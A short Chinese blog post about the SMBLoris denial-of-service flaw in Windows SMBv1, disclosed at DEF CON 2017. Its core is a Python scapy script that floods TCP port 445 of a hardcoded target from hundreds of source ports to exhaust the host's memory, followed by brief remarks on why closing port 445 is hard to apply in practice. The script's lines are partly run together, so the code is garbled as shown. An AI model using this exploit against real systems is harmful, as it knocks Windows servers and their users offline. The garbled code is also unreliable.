SMBLoris windows拒绝服务漏洞

在美国拉斯维加斯举行的2017年度DEF CON黑客大会上,安全研究人员公布了Windows系统上的一个长达20年没有发现的漏洞,该漏洞名为“SMBLoris”,黑客可以轻松的使用简短的20行代码利用该漏洞即可发起DoS攻击导致系统内存资源耗尽,该漏洞影响Windows 2000及以上系统的SMBv1协议。

from scapy.all import *
import sys
p0 = int(sys.argv[1])
conf.L3socket
conf.L3socket=L3RawSocket i = IP()
i.dst = "192.168.2.3"
t = TCP()
t.dport = 445 for p in range(p0,p0+700):
print p
t.sport = p
t.flags = "S" r = sr1(i/t)
rt = r[TCP]
t.ack = rt.seq + 1
t.seq = rt.ack
t.flags = "A"
sbss = '\x00\x01\xff\xff'
send(i/t/sbss)

以上脚本必须在linux运行,不支持win和unix系列系统。

需要注意的是,企业内网的域环境是依赖于smb协议的,文件共享和打印机服务使得漏洞修复建议上的“关闭445端口”很难落地。

国内某公司提供了一键修复的处理方法,实质也是在注册表中关闭445端口。

参考链接:

https://www.youtube.com/watch?v=Y77er0gzQqA 油管演示过程

以漏洞名命名的域名:https://smbloris.com/

上一篇:Tab指示符——Indicator


下一篇:windows2003 64位注册码 序列号 激活码